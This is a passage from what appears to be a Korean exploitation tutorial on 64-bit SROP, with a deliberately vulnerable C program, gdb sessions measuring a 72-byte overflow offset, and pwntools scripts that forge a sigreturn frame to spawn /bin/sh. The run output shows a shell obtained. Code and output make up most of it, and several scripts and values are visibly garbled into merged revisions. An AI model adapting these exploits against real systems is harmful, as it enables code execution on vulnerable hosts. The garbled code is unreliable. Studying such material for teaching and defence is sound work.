...
//gcc -fno-stack-protector -o srop64 srop64.c -ldl
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>

/* Deliberately vulnerable demo target for the SROP write-up on this page.
 * It leaks the runtime address of printf() (the ASLR bypass the exploit
 * script relies on) and then reads far more than buf can hold. Because the
 * binary is built with -fno-stack-protector, the overflow reaches the saved
 * return address directly; the gdb session on this page measures the
 * distance from buf to that slot as 72 bytes (buf lives at rbp-0x40). */
void vuln(){
    char buf[50];
    /* RTLD_NEXT resolves printf in the next object in search order (libc),
     * so the printed pointer is an address inside the loaded libc. */
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    /* NOTE(review): the length literal is garbled on this page ("256512");
     * the disassembly shows it as 0x100/0x200 in two revisions. Either way
     * it exceeds sizeof(buf) and overwrites the saved rbp/return address. */
    read(0, buf, 256512);
}

/* Non-standard `void main` as in the original; kept as written. */
void main(){
    seteuid(getuid());
    /* Writes 10 bytes, so the trailing '\n' of the literal is not emitted. */
    write(1,"Hello SROP\n",10);
    vuln();
}
...
lazenca0x0@ubuntu:~/Exploit/SROP$ gdb -q ./srop64 Reading symbols from ./srop64...(no debugging symbols found)...done. gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x0000000000400756 <+0>: push rbp 0x0000000000400757 <+1>: mov rbp,rsp 0x000000000040075a <+4>: sub rsp,0x40 0x000000000040075e <+8>: mov esi,0x400864 0x0000000000400763 <+13>: mov rdi,0xffffffffffffffff 0x000000000040076a <+20>: call 0x400630 <dlsym@plt> 0x000000000040076f <+25>: mov QWORD PTR [rbp-0x8],rax 0x0000000000400773 <+29>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400777 <+33>: mov rsi,rax 0x000000000040077a <+36>: mov edi,0x40086b 0x000000000040077f <+41>: mov eax,0x0 0x0000000000400784 <+46>: call 0x400600 <printf@plt> 0x0000000000400789 <+51>: lea rax,[rbp-0x40] 0x000000000040078d <+55>: mov edx,0x1000x200 0x0000000000400792 <+60>: mov rsi,rax 0x0000000000400795 <+63>: mov edi,0x0 0x000000000040079a <+68>: call 0x400610 <read@plt> 0x000000000040079f <+73>: nop 0x00000000004007a0 <+74>: leave 0x00000000004007a1 <+75>: ret End of assembler dump. gdb-peda$ b *0x0000000000400756 Breakpoint 1 at 0x400756 gdb-peda$ b *0x000000000040079a Breakpoint 2 at 0x40079a gdb-peda$ |
...
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/SROP/srop64 Hello SROP Breakpoint 1, 0x0000000000400756 in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe498 0x7fffffffe498 gdb-peda$ x/gx 0x7fffffffe498 0x7fffffffe498: 0x00000000004007d0 gdb-peda$ x/i 0x00000000004007d0 0x4007d0 <main+46>: nop gdb-peda$ c Continuing. Printf() address : 0x7ffff785e800 Breakpoint 2, 0x000000000040079a in vuln () gdb-peda$ i r rsi rsi 0x7fffffffe450 0x7fffffffe450 gdb-peda$ p/d 0x7fffffffe498 - 0x7fffffffe450 $1 = 72 gdb-peda$ |
...
lazenca0x0@ubuntu:~/Exploit/SROP$ readelf --notes ./srop64 Displaying notes found at file offset 0x00000254 with length 0x00000020: Owner Data size Description GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag) OS: Linux, ABI: 2.6.32 Displaying notes found at file offset 0x00000274 with length 0x00000024: Owner Data size Description GNU 0x00000014 NT_GNU_BUILD_ID (unique build ID bitstring) Build ID: e3f2a207a17917c441c725ef3e150798d250b6ce 8bc6a6d7b9f016893a86290ec9ed1b41769e9cfc lazenca0x0@ubuntu:~/Exploit/SROP$ gdb -q ./srop64 gdb-peda$ b *0x0000000000400756 Breakpoint 1 at 0x400756 gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/SROP/srop64 Hello SROP Breakpoint 1, 0x0000000000400756 in vuln () gdb-peda$ vmmap Start End Perm Name ... 0x00007ffffffde000 0x00007ffffffff000 rw-p [stack] 0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall] gdb-peda$ x/3i 0xffffffffff600000 0xffffffffff600000: mov rax,0x60 0xffffffffff600007: syscall 0xffffffffff600009: ret gdb-peda$ |
...
from pwn import * binary = ELF('./srop64') p = process(binary.path) sleep(20) p.recvuntil('Printf() address : ') stackAddr = p.recvuntil('\n') stackAddr = int(stackAddr,16) libcBase = stackAddr - 0x55800 sigreturnsyscall = libcBase + 0x5e96c00xbc375 #syscall = 0xffffffffff600007 binsh = libcBase + 0x18cd57 syscallpoprax = libcBase + 0xbc3750x33544 #syscall = 0xffffffffff600007 poprax = libcBase + 0x33544 printprint 'The base address of Libc : ' + hex(libcBase) print hex(sigreturn) print'Address of syscall gadget : ' + hex(binshsyscall) print hex(syscall'Address of string "/bin/sh" : ' + hex(binsh) print 'Address of poprax gadget : ' + hex(poprax) exploit = '' exploit += "\x90" * 72 exploit += p64(poprax) exploit += p64(0xf) exploit += p64(syscall) #ucontext exploit += p64(0x0) * 5 #sigcontext exploit += p64(0x0) #R8 exploit += p64(0x0) #R9 exploit += p64(0x0) #R10 exploit += p64(0x0) #R11 exploit += p64(0x0) #R12 exploit += p64(0x0) #R13 exploit += p64(0x0) #R14 exploit += p64(0x0) #R15 exploit += p64(binsh) #RDI exploit += p64(0x0) #RSI exploit += p64(0x0) #RBP exploit += p64(0x0) #RBX exploit += p64(0x0) #RDX exploit += p64(constants.SYS_execve0x3b) #RAX exploit += p64(0x0) #RCX exploit += p64(syscall) #RSP exploit += p64(syscall) #RIP exploit += p64(0x0) #eflags exploit += p64(0x33) #cs exploit += p64(0x0) #gs exploit += p64(0x0) #fs exploit += p64(0x2b) #ss p.send(exploit) p.interactive() |
- pwntools를 이용해 조금 더 편하게 코드를 작성할 수 있습니다.
lazenca0x0@ubuntu:~/Exploit$ python srop64.py | from pwn import * binary = ELF('. [*] '/home/lazenca0x0/Exploit/SROP/srop64') p = process(binary.path) #sleep(20) p.recvuntil('Printf() address Arch: ') stackAddr = p.recvuntil('\n') stackAddr = int(stackAddr,16) libcBase = stackAddr - 0x55800 binsh = libcBase + 0x18cd57 syscall = libcBase + 0xbc375 poprax = libcBase + 0x33544 print hex(libcBase) print hex(binsh) print hex(syscall) print hex(poprax) exploit = '' exploit += "\x90" * 72 exploit += p64(poprax) exploit += p64(0xf) exploit += p64(syscall) frame = SigreturnFrame(arch="amd64") frame.rax = 0x3b frame.rdi = binsh frame.rsp = syscall frame.rip = syscall exploit += str(frame) p.send(exploit) p.interactive() amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Starting local process '/home/lazenca0x0/Exploit/SROP/srop64': pid 17771 The base address of Libc : 0x7f9cb1ae2000 Address of syscall gadget : 0x7f9cb1b9d945 Address of string "/bin/sh" : 0x7f9cb1c6e58b Address of poprax gadget : 0x7f9cb1b1c718 [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
- pwntools를 이용해 조금 더 편하게 코드를 작성할 수 있습니다.
# Python 2 / pwntools script (print statements, str(frame)); it is the
# SigreturnFrame version of the hand-built frame shown earlier on this page.
from pwn import *
# 64-bit target (the ELF banner in the run output reports amd64-64-little);
# context.arch also selects the register layout SigreturnFrame produces.
context.arch = "amd64"
binary = ELF('./srop64')
p = process(binary.path)
# vuln() prints printf()'s runtime address before it reads input; that leak
# is the only information this script needs to defeat ASLR for libc.
p.recvuntil('Printf() address : ')
# NOTE: despite the name, this holds the leaked printf() address (a libc
# pointer), not a stack address. int() tolerates the trailing newline.
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
# All offsets below are specific to the libc build used in this write-up
# (0x55800 is printf's offset in that libc); they do not transfer to another
# libc version.
libcBase = stackAddr - 0x55800
syscall = libcBase + 0xbc375    # syscall instruction inside libc
binsh = libcBase + 0x18cd57     # "/bin/sh" string inside libc
poprax = libcBase + 0x33544     # gadget that pops rax (inferred from its use below)
print 'The base address of Libc : ' + hex(libcBase)
print 'Address of syscall gadget : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of poprax gadget : ' + hex(poprax)
exploit = ''
# 72 bytes of filler reach the saved return address: the gdb session on this
# page shows buf at 0x...e450 and the return slot at 0x...e498 (diff = 72).
exploit += "\x90" * 72
# Stage 1: rax = 0xf (rt_sigreturn on x86-64), then hit the syscall gadget so
# the kernel "restores" registers from the forged frame that follows.
exploit += p64(poprax)
exploit += p64(0xf)
exploit += p64(syscall)
# Stage 2: the forged ucontext/sigcontext. The earlier hand-rolled version on
# this page lists every field (r8..r15, rdi, rsi, ..., cs=0x33, ss=0x2b);
# SigreturnFrame builds the same layout and only the relevant fields are set.
frame = SigreturnFrame(arch="amd64")
frame.rax = constants.SYS_execve
frame.rdi = binsh               # execve("/bin/sh", rsi, rdx); rsi/rdx stay 0
# rsp is pointed at the same gadget so the restored stack pointer lands on
# mapped memory — presumably only rip has to be the syscall instruction.
frame.rsp = syscall
frame.rip = syscall             # execution resumes at `syscall` with rax=SYS_execve
exploit += str(frame)
p.send(exploit)
p.interactive()
lazenca0x0@ubuntu:~/Exploit/SROP$ python srop64-pwn.py
[*] '/home/lazenca0x0/Exploit/srop64'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/home/lazenca0x0/Exploit/SROP/srop64': pid 17757
The base address of Libc : 0x7f36d0719000
Address of syscall gadget : 0x7f36d07d4945
Address of string "/bin/sh" : 0x7f36d08a558b
Address of poprax gadget : 0x7f36d0753718
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ |
Related site
- http://egloos.zum.com/studyfoss/v/5182475
- http://docs.pwntools.com/en/stable/rop/srop.html
- http://www.freebuf.com/articles/network/87447.html
- http://blog.leanote.com/post/3191220142@qq.com/SROP
- http://blackbunny.io/x64-sigreturn-oriented-programming/
- https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
- https://books.google.co.jp/books?id=h0lltXyJ8aIC&dq=setup_frame&hl=ko&source=gbs_navlinks_s
- https://thisissecurity.stormshield.com/2015/01/03/playing-with-signals-an-overview-on-sigreturn-oriented-programming/
...